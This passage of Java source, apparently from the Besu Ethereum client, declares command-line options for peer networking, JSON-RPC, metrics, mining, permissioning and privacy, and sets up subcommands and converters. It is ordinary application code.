\"key\" in the Besu data folder)") private final File nodePrivateKeyFile = null; @Option( names = "--identity", paramLabel = "<String>", description = "Identification for this node in the Client ID", arity = "1") private final Optional<String> identityString = Optional.empty(); // Completely disables P2P within Besu. @Option( names = {"--p2p-enabled"}, description = "Enable P2P functionality (default: ${DEFAULT-VALUE})", arity = "1") private final Boolean p2pEnabled = true; // Boolean option to indicate if peers should NOT be discovered, default to // false indicates that // the peers should be discovered by default. // // This negative option is required because of the nature of the option that is // true when // added on the command line. You can't do --option=false, so false is set as // default // and you have not to set the option at all if you want it false. // This seems to be the only way it works with Picocli. // Also many other software use the same negative option scheme for false // defaults // meaning that it's probably the right way to handle disabling options. @Option( names = {"--discovery-enabled"}, description = "Enable P2P discovery (default: ${DEFAULT-VALUE})", arity = "1") private final Boolean peerDiscoveryEnabled = true; // A list of bootstrap nodes can be passed // and a hardcoded list will be used otherwise by the Runner. // NOTE: we have no control over default value here. @Option( names = {"--bootnodes"}, paramLabel = "<enode://id@host:port>", description = "Comma separated enode URLs for P2P discovery bootstrap. " + "Default is a predefined list.", split = ",", arity = "0..*") private final List<String> bootNodes = null; @Option( names = {"--max-peers"}, paramLabel = MANDATORY_INTEGER_FORMAT_HELP, description = "Maximum P2P connections that can be established (default: ${DEFAULT-VALUE})") private final Integer maxPeers = DEFAULT_MAX_PEERS; @Option( names = {"--remote-connections-limit-enabled"}, description = "Whether to limit the number of P2P connections initiated remotely. (default: ${DEFAULT-VALUE})") private final Boolean isLimitRemoteWireConnectionsEnabled = true; @Option( names = {"--remote-connections-max-percentage"}, paramLabel = MANDATORY_DOUBLE_FORMAT_HELP, description = "The maximum percentage of P2P connections that can be initiated remotely. Must be between 0 and 100 inclusive. (default: ${DEFAULT-VALUE})", arity = "1", converter = PercentageConverter.class) private final Integer maxRemoteConnectionsPercentage = Fraction.fromFloat(DEFAULT_FRACTION_REMOTE_WIRE_CONNECTIONS_ALLOWED) .toPercentage() .getValue(); @Option( names = {"--random-peer-priority-enabled"}, description = "Allow for incoming connections to be prioritized randomly. This will prevent (typically small, stable) networks from forming impenetrable peer cliques. (default: ${DEFAULT-VALUE})") private final Boolean randomPeerPriority = false; @Option( names = {"--banned-node-ids", "--banned-node-id"}, paramLabel = MANDATORY_NODE_ID_FORMAT_HELP, description = "A list of node IDs to ban from the P2P network.", split = ",", arity = "1..*") void setBannedNodeIds(final List<String> values) { try { bannedNodeIds = values.stream() .filter(value -> !value.isEmpty()) .map(EnodeURL::parseNodeId) .collect(Collectors.toList()); } catch (final IllegalArgumentException e) { throw new ParameterException( commandLine, "Invalid ids supplied to '--banned-node-ids'. " + e.getMessage()); } } private Collection<Bytes> bannedNodeIds = new ArrayList<>(); @Option( names = {"--sync-mode"}, paramLabel = MANDATORY_MODE_FORMAT_HELP, description = "Synchronization mode, possible values are ${COMPLETION-CANDIDATES} (default: FAST if a --network is supplied and privacy isn't enabled. FULL otherwise.)") private SyncMode syncMode = null; @Option( names = {"--fast-sync-min-peers"}, paramLabel = MANDATORY_INTEGER_FORMAT_HELP, description = "Minimum number of peers required before starting fast sync. (default: ${DEFAULT-VALUE})") private final Integer fastSyncMinPeerCount = FAST_SYNC_MIN_PEER_COUNT; @Option( names = {"--network"}, paramLabel = MANDATORY_NETWORK_FORMAT_HELP, description = "Synchronize against the indicated network, possible values are ${COMPLETION-CANDIDATES}." + " (default: MAINNET)") private final NetworkName network = null; @SuppressWarnings({"FieldCanBeFinal", "FieldMayBeFinal"}) // PicoCLI requires non-final Strings. @Option( names = {"--p2p-host"}, paramLabel = MANDATORY_HOST_FORMAT_HELP, description = "Ip address this node advertises to its peers (default: ${DEFAULT-VALUE})", arity = "1") private String p2pHost = autoDiscoverDefaultIP().getHostAddress(); @SuppressWarnings({"FieldCanBeFinal", "FieldMayBeFinal"}) // PicoCLI requires non-final Strings. @Option( names = {"--p2p-interface"}, paramLabel = MANDATORY_HOST_FORMAT_HELP, description = "The network interface address on which this node listens for P2P communication (default: ${DEFAULT-VALUE})", arity = "1") private String p2pInterface = NetworkUtility.INADDR_ANY; @Option( names = {"--p2p-port"}, paramLabel = MANDATORY_PORT_FORMAT_HELP, description = "Port on which to listen for P2P communication (default: ${DEFAULT-VALUE})", arity = "1") private final Integer p2pPort = EnodeURL.DEFAULT_LISTENING_PORT; @Option( names = {"--nat-method"}, description = "Specify the NAT circumvention method to be used, possible values are ${COMPLETION-CANDIDATES}." + " NONE disables NAT functionality. (default: ${DEFAULT-VALUE})") private final NatMethod natMethod = DEFAULT_NAT_METHOD; @Option( names = {"--network-id"}, paramLabel = "<BIG INTEGER>", description = "P2P network identifier. (default: the selected network chain ID or custom genesis chain ID)", arity = "1") private final BigInteger networkId = null; @Option( names = {"--graphql-http-enabled"}, description = "Set to start the GraphQL HTTP service (default: ${DEFAULT-VALUE})") private final Boolean isGraphQLHttpEnabled = false; @SuppressWarnings({"FieldCanBeFinal", "FieldMayBeFinal"}) // PicoCLI requires non-final Strings. @Option( names = {"--graphql-http-host"}, paramLabel = MANDATORY_HOST_FORMAT_HELP, description = "Host for GraphQL HTTP to listen on (default: ${DEFAULT-VALUE})", arity = "1") private String graphQLHttpHost = autoDiscoverDefaultIP().getHostAddress(); @Option( names = {"--graphql-http-port"}, paramLabel = MANDATORY_PORT_FORMAT_HELP, description = "Port for GraphQL HTTP to listen on (default: ${DEFAULT-VALUE})", arity = "1") private final Integer graphQLHttpPort = DEFAULT_GRAPHQL_HTTP_PORT; @Option( names = {"--graphql-http-cors-origins"}, description = "Comma separated origin domain URLs for CORS validation (default: none)") private final CorsAllowedOriginsProperty graphQLHttpCorsAllowedOrigins = new CorsAllowedOriginsProperty(); @Option( names = {"--rpc-http-enabled"}, description = "Set to start the JSON-RPC HTTP service (default: ${DEFAULT-VALUE})") private final Boolean isRpcHttpEnabled = false; @SuppressWarnings({"FieldCanBeFinal", "FieldMayBeFinal"}) // PicoCLI requires non-final Strings. @Option( names = {"--rpc-http-host"}, paramLabel = MANDATORY_HOST_FORMAT_HELP, description = "Host for JSON-RPC HTTP to listen on (default: ${DEFAULT-VALUE})", arity = "1") private String rpcHttpHost = autoDiscoverDefaultIP().getHostAddress(); @Option( names = {"--rpc-http-port"}, paramLabel = MANDATORY_PORT_FORMAT_HELP, description = "Port for JSON-RPC HTTP to listen on (default: ${DEFAULT-VALUE})", arity = "1") private final Integer rpcHttpPort = DEFAULT_JSON_RPC_PORT; @Option( names = {"--rpc-http-max-active-connections"}, description = "Maximum number of HTTP connections allowed for JSON-RPC (default: ${DEFAULT-VALUE}). Once this limit is reached, incoming connections will be rejected.", arity = "1") private final Integer rpcHttpMaxConnections = DEFAULT_HTTP_MAX_CONNECTIONS; // A list of origins URLs that are accepted by the JsonRpcHttpServer (CORS) @Option( names = {"--rpc-http-cors-origins"}, description = "Comma separated origin domain URLs for CORS validation (default: none)") private final CorsAllowedOriginsProperty rpcHttpCorsAllowedOrigins = new CorsAllowedOriginsProperty(); @Option( names = {"--rpc-http-api", "--rpc-http-apis"}, paramLabel = "<api name>", split = ",", arity = "1..*", converter = RpcApisConverter.class, description = "Comma separated list of APIs to enable on JSON-RPC HTTP service (default: ${DEFAULT-VALUE})") private final Collection<RpcApi> rpcHttpApis = DEFAULT_JSON_RPC_APIS; @Option( names = {"--rpc-http-authentication-enabled"}, description = "Require authentication for the JSON-RPC HTTP service (default: ${DEFAULT-VALUE})") private final Boolean isRpcHttpAuthenticationEnabled = false; @SuppressWarnings({"FieldCanBeFinal", "FieldMayBeFinal"}) // PicoCLI requires non-final Strings. @CommandLine.Option( names = {"--rpc-http-authentication-credentials-file"}, paramLabel = MANDATORY_FILE_FORMAT_HELP, description = "Storage file for JSON-RPC HTTP authentication credentials (default: ${DEFAULT-VALUE})", arity = "1") private String rpcHttpAuthenticationCredentialsFile = null; @CommandLine.Option( names = {"--rpc-http-authentication-jwt-public-key-file"}, paramLabel = MANDATORY_FILE_FORMAT_HELP, description = "JWT public key file for JSON-RPC HTTP authentication", arity = "1") private final File rpcHttpAuthenticationPublicKeyFile = null; @Option( names = {"--rpc-http-tls-enabled"}, description = "Enable TLS for the JSON-RPC HTTP service (default: ${DEFAULT-VALUE})") private final Boolean isRpcHttpTlsEnabled = false; @Option( names = {"--rpc-http-tls-keystore-file"}, paramLabel = MANDATORY_FILE_FORMAT_HELP, description = "Keystore (PKCS#12) containing key/certificate for the JSON-RPC HTTP service. Required if TLS is enabled.") private final Path rpcHttpTlsKeyStoreFile = null; @Option( names = {"--rpc-http-tls-keystore-password-file"}, paramLabel = MANDATORY_FILE_FORMAT_HELP, description = "File containing password to unlock keystore for the JSON-RPC HTTP service. Required if TLS is enabled.") private final Path rpcHttpTlsKeyStorePasswordFile = null; @Option( names = {"--rpc-http-tls-client-auth-enabled"}, description = "Enable TLS client authentication for the JSON-RPC HTTP service (default: ${DEFAULT-VALUE})") private final Boolean isRpcHttpTlsClientAuthEnabled = false; @Option( names = {"--rpc-http-tls-known-clients-file"}, paramLabel = MANDATORY_FILE_FORMAT_HELP, description = "Path to file containing clients certificate common name and fingerprint for client authentication") private final Path rpcHttpTlsKnownClientsFile = null; @Option( names = {"--rpc-http-tls-ca-clients-enabled"}, description = "Enable to accept clients certificate signed by a valid CA for client authentication (default: ${DEFAULT-VALUE})") private final Boolean isRpcHttpTlsCAClientsEnabled = false; @Option( names = {"--rpc-ws-enabled"}, description = "Set to start the JSON-RPC WebSocket service (default: ${DEFAULT-VALUE})") private final Boolean isRpcWsEnabled = false; @SuppressWarnings({"FieldCanBeFinal", "FieldMayBeFinal"}) // PicoCLI requires non-final Strings. @Option( names = {"--rpc-ws-host"}, paramLabel = MANDATORY_HOST_FORMAT_HELP, description = "Host for JSON-RPC WebSocket service to listen on (default: ${DEFAULT-VALUE})", arity = "1") private String rpcWsHost = autoDiscoverDefaultIP().getHostAddress(); @Option( names = {"--rpc-ws-port"}, paramLabel = MANDATORY_PORT_FORMAT_HELP, description = "Port for JSON-RPC WebSocket service to listen on (default: ${DEFAULT-VALUE})", arity = "1") private final Integer rpcWsPort = DEFAULT_WEBSOCKET_PORT; @Option( names = {"--rpc-ws-max-active-connections"}, description = "Maximum number of WebSocket connections allowed for JSON-RPC (default: ${DEFAULT-VALUE}). Once this limit is reached, incoming connections will be rejected.", arity = "1") private final Integer rpcWsMaxConnections = DEFAULT_WS_MAX_CONNECTIONS; @Option( names = {"--rpc-ws-api", "--rpc-ws-apis"}, paramLabel = "<api name>", split = ",", arity = "1..*", converter = RpcApisConverter.class, description = "Comma separated list of APIs to enable on JSON-RPC WebSocket service (default: ${DEFAULT-VALUE})") private final List<RpcApi> rpcWsApis = DEFAULT_JSON_RPC_APIS; @Option( names = {"--rpc-ws-authentication-enabled"}, description = "Require authentication for the JSON-RPC WebSocket service (default: ${DEFAULT-VALUE})") private final Boolean isRpcWsAuthenticationEnabled = false; @SuppressWarnings({"FieldCanBeFinal", "FieldMayBeFinal"}) // PicoCLI requires non-final Strings. @CommandLine.Option( names = {"--rpc-ws-authentication-credentials-file"}, paramLabel = MANDATORY_FILE_FORMAT_HELP, description = "Storage file for JSON-RPC WebSocket authentication credentials (default: ${DEFAULT-VALUE})", arity = "1") private String rpcWsAuthenticationCredentialsFile = null; @CommandLine.Option( names = {"--rpc-ws-authentication-jwt-public-key-file"}, paramLabel = MANDATORY_FILE_FORMAT_HELP, description = "JWT public key file for JSON-RPC WebSocket authentication", arity = "1") private final File rpcWsAuthenticationPublicKeyFile = null; @Option( names = {"--privacy-tls-enabled"}, paramLabel = MANDATORY_FILE_FORMAT_HELP, description = "Enable TLS for connecting to privacy enclave (default: ${DEFAULT-VALUE})") private final Boolean isPrivacyTlsEnabled = false; @Option( names = "--privacy-tls-keystore-file", paramLabel = MANDATORY_FILE_FORMAT_HELP, description = "Path to a PKCS#12 formatted keystore; used to enable TLS on inbound connections.") private final Path privacyKeyStoreFile = null; @Option( names = "--privacy-tls-keystore-password-file", paramLabel = MANDATORY_FILE_FORMAT_HELP, description = "Path to a file containing the password used to decrypt the keystore.") private final Path privacyKeyStorePasswordFile = null; @Option( names = "--privacy-tls-known-enclave-file", paramLabel = MANDATORY_FILE_FORMAT_HELP, description = "Path to a file containing the fingerprints of the authorized privacy enclave.") private final Path privacyTlsKnownEnclaveFile = null; @Option( names = {"--metrics-enabled"}, description = "Set to start the metrics exporter (default: ${DEFAULT-VALUE})") private final Boolean isMetricsEnabled = false; @SuppressWarnings({"FieldCanBeFinal", "FieldMayBeFinal"}) // PicoCLI requires non-final Strings. @Option( names = {"--metrics-protocol"}, description = "Metrics protocol, one of PROMETHEUS, OPENTELEMETRY or NONE. (default: ${DEFAULT-VALUE})") private MetricsProtocol metricsProtocol = PROMETHEUS; @SuppressWarnings({"FieldCanBeFinal", "FieldMayBeFinal"}) // PicoCLI requires non-final Strings. @Option( names = {"--metrics-host"}, paramLabel = MANDATORY_HOST_FORMAT_HELP, description = "Host for the metrics exporter to listen on (default: ${DEFAULT-VALUE})", arity = "1") private String metricsHost = autoDiscoverDefaultIP().getHostAddress(); @Option( names = {"--metrics-port"}, paramLabel = MANDATORY_PORT_FORMAT_HELP, description = "Port for the metrics exporter to listen on (default: ${DEFAULT-VALUE})", arity = "1") private final Integer metricsPort = DEFAULT_METRICS_PORT; @Option( names = {"--metrics-category", "--metrics-categories"}, paramLabel = "<category name>", split = ",", arity = "1..*", description = "Comma separated list of categories to track metrics for (default: ${DEFAULT-VALUE})") private final Set<MetricCategory> metricCategories = DEFAULT_METRIC_CATEGORIES; @Option( names = {"--metrics-push-enabled"}, description = "Enable the metrics push gateway integration (default: ${DEFAULT-VALUE})") private final Boolean isMetricsPushEnabled = false; @SuppressWarnings({"FieldCanBeFinal", "FieldMayBeFinal"}) // PicoCLI requires non-final Strings. @Option( names = {"--metrics-push-host"}, paramLabel = MANDATORY_HOST_FORMAT_HELP, description = "Host of the Prometheus Push Gateway for push mode (default: ${DEFAULT-VALUE})", arity = "1") private String metricsPushHost = autoDiscoverDefaultIP().getHostAddress(); @Option( names = {"--metrics-push-port"}, paramLabel = MANDATORY_PORT_FORMAT_HELP, description = "Port of the Prometheus Push Gateway for push mode (default: ${DEFAULT-VALUE})", arity = "1") private final Integer metricsPushPort = DEFAULT_METRICS_PUSH_PORT; @Option( names = {"--metrics-push-interval"}, paramLabel = MANDATORY_INTEGER_FORMAT_HELP, description = "Interval in seconds to push metrics when in push mode (default: ${DEFAULT-VALUE})", arity = "1") private final Integer metricsPushInterval = 15; @SuppressWarnings({"FieldCanBeFinal", "FieldMayBeFinal"}) // PicoCLI requires non-final Strings. @Option( names = {"--metrics-push-prometheus-job"}, description = "Job name to use when in push mode (default: ${DEFAULT-VALUE})", arity = "1") private String metricsPrometheusJob = "besu-client"; @Option( names = {"--host-allowlist"}, paramLabel = "<hostname>[,<hostname>...]... or * or all", description = "Comma separated list of hostnames to allow for RPC access, or * to accept any host (default: ${DEFAULT-VALUE})", defaultValue = "localhost,127.0.0.1") private final JsonRPCAllowlistHostsProperty hostsAllowlist = new JsonRPCAllowlistHostsProperty(); @Option( names = {"--host-whitelist"}, hidden = true, paramLabel = "<hostname>[,<hostname>...]... or * or all", description = "Deprecated in favor of --host-allowlist. Comma separated list of hostnames to allow for RPC access, or * to accept any host (default: ${DEFAULT-VALUE})") private final JsonRPCAllowlistHostsProperty hostsWhitelist = new JsonRPCAllowlistHostsProperty(); @Option( names = {"--logging", "-l"}, paramLabel = "<LOG VERBOSITY LEVEL>", description = "Logging verbosity levels: OFF, FATAL, ERROR, WARN, INFO, DEBUG, TRACE, ALL") private final Level logLevel = null; @SuppressWarnings({"FieldCanBeFinal", "FieldMayBeFinal"}) @Option( names = {"--color-enabled"}, description = "Force color output to be enabled/disabled (default: colorized only if printing to console)") private static Boolean colorEnabled = null; @Option( names = {"--reorg-logging-threshold"}, description = "How deep a chain reorganization must be in order for it to be logged (default: ${DEFAULT-VALUE})") private final Long reorgLoggingThreshold = 6L; @Option( names = {"--miner-enabled"}, description = "Set if node will perform mining (default: ${DEFAULT-VALUE})") private final Boolean isMiningEnabled = false; @Option( names = {"--miner-stratum-enabled"}, description = "Set if node will perform Stratum mining (default: ${DEFAULT-VALUE})") private final Boolean iStratumMiningEnabled = false; @SuppressWarnings({"FieldCanBeFinal", "FieldMayBeFinal"}) // PicoCLI requires non-final Strings. @Option( names = {"--miner-stratum-host"}, description = "Host for Stratum network mining service (default: ${DEFAULT-VALUE})") private String stratumNetworkInterface = "0.0.0.0"; @Option( names = {"--miner-stratum-port"}, description = "Stratum port binding (default: ${DEFAULT-VALUE})") private final Integer stratumPort = 8008; @Option( names = {"--miner-coinbase"}, description = "Account to which mining rewards are paid. You must specify a valid coinbase if " + "mining is enabled using --miner-enabled option", arity = "1") private final Address coinbase = null; @Option( names = {"--min-gas-price"}, description = "Minimum price (in Wei) offered by a transaction for it to be included in a mined " + "block (default: ${DEFAULT-VALUE})", arity = "1") private final Wei minTransactionGasPrice = DEFAULT_MIN_TRANSACTION_GAS_PRICE; @Option( names = {"--rpc-tx-feecap"}, description = "Maximum transaction fees (in Wei) accepted for transaction submitted through RPC (default: ${DEFAULT-VALUE})", arity = "1") private final Wei txFeeCap = DEFAULT_RPC_TX_FEE_CAP; @Option( names = {"--min-block-occupancy-ratio"}, description = "Minimum occupancy ratio for a mined block (default: ${DEFAULT-VALUE})", arity = "1") private final Double minBlockOccupancyRatio = DEFAULT_MIN_BLOCK_OCCUPANCY_RATIO; @Option( names = {"--miner-extra-data"}, description = "A hex string representing the (32) bytes to be included in the extra data " + "field of a mined block (default: ${DEFAULT-VALUE})", arity = "1") private final Bytes extraData = DEFAULT_EXTRA_DATA; @Option( names = {"--pruning-enabled"}, description = "Enable disk-space saving optimization that removes old state that is unlikely to be required (default: ${DEFAULT-VALUE})") private final Boolean pruningEnabled = false; @Option( names = {"--permissions-nodes-config-file-enabled"}, description = "Enable node level permissions (default: ${DEFAULT-VALUE})") private final Boolean permissionsNodesEnabled = false; @SuppressWarnings({"FieldCanBeFinal", "FieldMayBeFinal"}) // PicoCLI requires non-final Strings. @CommandLine.Option( names = {"--permissions-nodes-config-file"}, description = "Node permissioning config TOML file (default: a file named \"permissions_config.toml\" in the Besu data folder)") private String nodePermissionsConfigFile = null; @Option( names = {"--permissions-accounts-config-file-enabled"}, description = "Enable account level permissions (default: ${DEFAULT-VALUE})") private final Boolean permissionsAccountsEnabled = false; @SuppressWarnings({"FieldCanBeFinal", "FieldMayBeFinal"}) // PicoCLI requires non-final Strings. @CommandLine.Option( names = {"--permissions-accounts-config-file"}, description = "Account permissioning config TOML file (default: a file named \"permissions_config.toml\" in the Besu data folder)") private String accountPermissionsConfigFile = null; @Option( names = {"--permissions-nodes-contract-address"}, description = "Address of the node permissioning smart contract", arity = "1") private final Address permissionsNodesContractAddress = null; @Option( names = {"--permissions-nodes-contract-version"}, description = "Version of the EEA Node Permissioning interface (default: ${DEFAULT-VALUE})") private final Integer permissionsNodesContractVersion = 1; @Option( names = {"--permissions-nodes-contract-enabled"}, description = "Enable node level permissions via smart contract (default: ${DEFAULT-VALUE})") private final Boolean permissionsNodesContractEnabled = false; @Option( names = {"--permissions-accounts-contract-address"}, description = "Address of the account permissioning smart contract", arity = "1") private final Address permissionsAccountsContractAddress = null; @Option( names = {"--permissions-accounts-contract-enabled"}, description = "Enable account level permissions via smart contract (default: ${DEFAULT-VALUE})") private final Boolean permissionsAccountsContractEnabled = false; @Option( names = {"--privacy-enabled"}, description = "Enable private transactions (default: ${DEFAULT-VALUE})") private final Boolean isPrivacyEnabled = false; @Option( names = {"--privacy-multi-tenancy-enabled"}, description = "Enable multi-tenant private transactions (default: ${DEFAULT-VALUE})") private final Boolean isPrivacyMultiTenancyEnabled = false; @Option( names = {"--revert-reason-enabled"}, description = "Enable passing the revert reason back through TransactionReceipts (default: ${DEFAULT-VALUE})") private final Boolean isRevertReasonEnabled = false; @Option( names = {"--required-blocks", "--required-block"}, paramLabel = "BLOCK=HASH", description = "Block number and hash peers are required to have.", arity = "*", split = ",") private final Map<Long, Hash> requiredBlocks = new HashMap<>(); @Option( names = {"--privacy-url"}, description = "The URL on which the enclave is running") private final URI privacyUrl = PrivacyParameters.DEFAULT_ENCLAVE_URL; @Option( names = {"--privacy-public-key-file"}, description = "The enclave's public key file") private final File privacyPublicKeyFile = null; @Option( names = {"--privacy-precompiled-address"}, description = "The address to which the privacy pre-compiled contract will be mapped (default: ${DEFAULT-VALUE})", hidden = true) private final Integer privacyPrecompiledAddress = Address.PRIVACY; @Option( names = {"--privacy-marker-transaction-signing-key-file"}, description = "The name of a file containing the private key used to sign privacy marker transactions. If unset, each will be signed with a random key.") private final Path privacyMarkerTransactionSigningKeyPath = null; @Option( names = {"--privacy-enable-database-migration"}, description = "Enable private database metadata migration (default: ${DEFAULT-VALUE})") private final Boolean migratePrivateDatabase = false; @Option( names = {"--privacy-flexible-groups-enabled", "--privacy-onchain-groups-enabled"}, description = "Enable flexible (onchain) privacy groups (default: ${DEFAULT-VALUE})") private final Boolean isFlexiblePrivacyGroupsEnabled = false; @Option( names = {"--target-gas-limit"}, description = "Sets target gas limit per block. If set each block's gas limit will approach this setting over time if the current gas limit is different.") private final Long targetGasLimit = null; @Option( names = {"--tx-pool-max-size"}, paramLabel = MANDATORY_INTEGER_FORMAT_HELP, description = "Maximum number of pending transactions that will be kept in the transaction pool (default: ${DEFAULT-VALUE})", arity = "1") private final Integer txPoolMaxSize = TransactionPoolConfiguration.MAX_PENDING_TRANSACTIONS; @Option( names = {"--tx-pool-hashes-max-size"}, paramLabel = MANDATORY_INTEGER_FORMAT_HELP, description = "Maximum number of pending transaction hashes that will be kept in the transaction pool (default: ${DEFAULT-VALUE})", arity = "1") private final Integer pooledTransactionHashesSize = TransactionPoolConfiguration.MAX_PENDING_TRANSACTIONS_HASHES; @Option( names = {"--tx-pool-retention-hours"}, paramLabel = MANDATORY_INTEGER_FORMAT_HELP, description = "Maximum retention period of pending transactions in hours (default: ${DEFAULT-VALUE})", arity = "1") private final Integer pendingTxRetentionPeriod = TransactionPoolConfiguration.DEFAULT_TX_RETENTION_HOURS; @Option( names = {"--tx-pool-price-bump"}, paramLabel = MANDATORY_INTEGER_FORMAT_HELP, converter = PercentageConverter.class, description = "Price bump percentage to replace an already existing transaction (default: ${DEFAULT-VALUE})", arity = "1") private final Integer priceBump = TransactionPoolConfiguration.DEFAULT_PRICE_BUMP.getValue(); @SuppressWarnings({"FieldCanBeFinal", "FieldMayBeFinal"}) // PicoCLI requires non-final Strings. @Option( names = {"--key-value-storage"}, description = "Identity for the key-value storage to be used.", arity = "1") private String keyValueStorageName = DEFAULT_KEY_VALUE_STORAGE_NAME; @SuppressWarnings({"FieldCanBeFinal", "FieldMayBeFinal"}) @Option( names = {"--security-module"}, paramLabel = "<NAME>", description = "Identity for the Security Module to be used.", arity = "1") private String securityModuleName = DEFAULT_SECURITY_MODULE; @Option( names = {"--auto-log-bloom-caching-enabled"}, description = "Enable automatic log bloom caching (default: ${DEFAULT-VALUE})", arity = "1") private final Boolean autoLogBloomCachingEnabled = true; @Option( names = {"--override-genesis-config"}, paramLabel = "NAME=VALUE", description = "Overrides configuration values in the genesis file. Use with care.", arity = "*", hidden = true, split = ",") private final Map<String, String> genesisConfigOverrides = new TreeMap<>(String.CASE_INSENSITIVE_ORDER); @Option( names = {"--pruning-blocks-retained"}, defaultValue = "1024", paramLabel = "<INTEGER>", description = "Minimum number of recent blocks for which to keep entire world state (default: ${DEFAULT-VALUE})", arity = "1") private final Integer pruningBlocksRetained = PrunerConfiguration.DEFAULT_PRUNING_BLOCKS_RETAINED; @Option( names = {"--pruning-block-confirmations"}, defaultValue = "10", paramLabel = "<INTEGER>", description = "Minimum number of confirmations on a block before marking begins (default: ${DEFAULT-VALUE})", arity = "1") private final Integer pruningBlockConfirmations = PrunerConfiguration.DEFAULT_PRUNING_BLOCK_CONFIRMATIONS; @CommandLine.Option( names = {"--pid-path"}, paramLabel = MANDATORY_PATH_FORMAT_HELP, description = "Path to PID file (optional)") private final Path pidPath = null; @CommandLine.Option( names = {"--api-gas-price-blocks"}, paramLabel = MANDATORY_PATH_FORMAT_HELP, description = "Number of blocks to consider for eth_gasPrice (default: ${DEFAULT-VALUE})") private final Long apiGasPriceBlocks = 100L; @CommandLine.Option( names = {"--api-gas-price-percentile"}, paramLabel = MANDATORY_PATH_FORMAT_HELP, description = "Percentile value to measure for eth_gasPrice (default: ${DEFAULT-VALUE})") private final Double apiGasPricePercentile = 50.0; @CommandLine.Option( names = {"--api-gas-price-max"}, paramLabel = MANDATORY_PATH_FORMAT_HELP, description = "Maximum gas price for eth_gasPrice (default: ${DEFAULT-VALUE})") private final Long apiGasPriceMax = 500_000_000_000L; @Option( names = {"--goquorum-compatibility-enabled"}, hidden = true, description = "Start Besu in GoQuorum compatibility mode (default: ${DEFAULT-VALUE})") private final Boolean isGoQuorumCompatibilityMode = false; @CommandLine.Option( names = {"--static-nodes-file"}, paramLabel = MANDATORY_FILE_FORMAT_HELP, description = "Specifies the static node file containing the static nodes for this node to connect to") private final Path staticNodesFile = null; private EthNetworkConfig ethNetworkConfig; private JsonRpcConfiguration jsonRpcConfiguration; private GraphQLConfiguration graphQLConfiguration; private WebSocketConfiguration webSocketConfiguration; private ApiConfiguration apiConfiguration; private MetricsConfiguration metricsConfiguration; private Optional<PermissioningConfiguration> permissioningConfiguration; private Collection<EnodeURL> staticNodes; private BesuController besuController; private BesuConfiguration pluginCommonConfiguration; private final Supplier<ObservableMetricsSystem> metricsSystem = Suppliers.memoize(() -> MetricsSystemFactory.create(metricsConfiguration())); private Vertx vertx; private EnodeDnsConfiguration enodeDnsConfiguration; private KeyValueStorageProvider keyValueStorageProvider; public BesuCommand( final Logger logger, final Supplier<RlpBlockImporter> rlpBlockImporter, final Function<BesuController, JsonBlockImporter> jsonBlockImporterFactory, final Function<Blockchain, RlpBlockExporter> rlpBlockExporterFactory, final RunnerBuilder runnerBuilder, final BesuController.Builder controllerBuilderFactory, final BesuPluginContextImpl besuPluginContext, final Map<String, String> environment) { this( logger, rlpBlockImporter, jsonBlockImporterFactory, rlpBlockExporterFactory, runnerBuilder, controllerBuilderFactory, besuPluginContext, environment, new StorageServiceImpl(), new SecurityModuleServiceImpl()); } @VisibleForTesting protected BesuCommand( final Logger logger, final Supplier<RlpBlockImporter> rlpBlockImporter, final Function<BesuController, JsonBlockImporter> jsonBlockImporterFactory, final Function<Blockchain, RlpBlockExporter> rlpBlockExporterFactory, final RunnerBuilder runnerBuilder, final BesuController.Builder controllerBuilderFactory, final BesuPluginContextImpl besuPluginContext, final Map<String, String> environment, final StorageServiceImpl storageService, final SecurityModuleServiceImpl securityModuleService) { this.logger = logger; this.rlpBlockImporter = rlpBlockImporter; this.rlpBlockExporterFactory = rlpBlockExporterFactory; this.jsonBlockImporterFactory = jsonBlockImporterFactory; this.runnerBuilder = runnerBuilder; this.controllerBuilderFactory = controllerBuilderFactory; this.besuPluginContext = besuPluginContext; this.environment = environment; this.storageService = storageService; this.securityModuleService = securityModuleService; pluginCommonConfiguration = new BesuCommandConfigurationService(); besuPluginContext.addService(BesuConfiguration.class, pluginCommonConfiguration); } public void parse( final AbstractParseResultHandler<List<Object>> resultHandler, final BesuExceptionHandler exceptionHandler, final InputStream in, final String... args) { commandLine = new CommandLine(this, new BesuCommandCustomFactory(besuPluginContext)) .setCaseInsensitiveEnumValuesAllowed(true); enableExperimentalEIPs(); addSubCommands(resultHandler, in); registerConverters(); handleUnstableOptions(); preparePlugins(); parse(resultHandler, exceptionHandler, args); } @Override public void run() { try { configureLogging(true); configureNativeLibs(); logger.info("Starting Besu version: {}", BesuInfo.nodeName(identityString)); // Need to create vertx after cmdline has been parsed, such that metricsSystem is configurable vertx = createVertx(createVertxOptions(metricsSystem.get())); final BesuCommand controller = validateOptions().configure().controller(); preSynchronizationTaskRunner.runTasks(controller.besuController); controller.startPlugins().startSynchronization(); } catch (final Exception e) { throw new ParameterException(this.commandLine, e.getMessage(), e); } } @VisibleForTesting void setBesuConfiguration(final BesuConfiguration pluginCommonConfiguration) { this.pluginCommonConfiguration = pluginCommonConfiguration; } private void enableExperimentalEIPs() { // Usage of static command line flags is strictly reserved for experimental EIPs commandLine.addMixin("experimentalEIPs", ExperimentalEIPs.class); } private void addSubCommands( final AbstractParseResultHandler<List<Object>> resultHandler, final InputStream in) { commandLine.addSubcommand( BlocksSubCommand.COMMAND_NAME, new BlocksSubCommand( rlpBlockImporter, jsonBlockImporterFactory, rlpBlockExporterFactory, resultHandler.out())); commandLine.addSubcommand( PublicKeySubCommand.COMMAND_NAME, new PublicKeySubCommand(resultHandler.out(), this::buildNodeKey)); commandLine.addSubcommand( PasswordSubCommand.COMMAND_NAME, new PasswordSubCommand(resultHandler.out())); commandLine.addSubcommand(RetestethSubCommand.COMMAND_NAME, new RetestethSubCommand()); commandLine.addSubcommand( RLPSubCommand.COMMAND_NAME, new RLPSubCommand(resultHandler.out(), in)); commandLine.addSubcommand( OperatorSubCommand.COMMAND_NAME, new OperatorSubCommand(resultHandler.out())); } private void registerConverters() { commandLine.registerConverter(Address.class, Address::fromHexStringStrict); commandLine.registerConverter(Bytes.class, Bytes::fromHexString); commandLine.registerConverter(Level.class, Level::valueOf); commandLine.registerConverter(SyncMode.class, SyncMode::fromString); commandLine.registerConverter(MetricsProtocol.class, MetricsProtocol::fromString); commandLine.registerConverter(UInt256.class, (arg) -> UInt256.valueOf(new BigInteger(arg))); commandLine.registerConverter(Wei.class, (arg) -> Wei.of(Long.parseUnsignedLong(arg))); commandLine.registerConverter(PositiveNumber.class, PositiveNumber::fromString); commandLine.registerConverter(Hash.class, Hash::fromHexString); 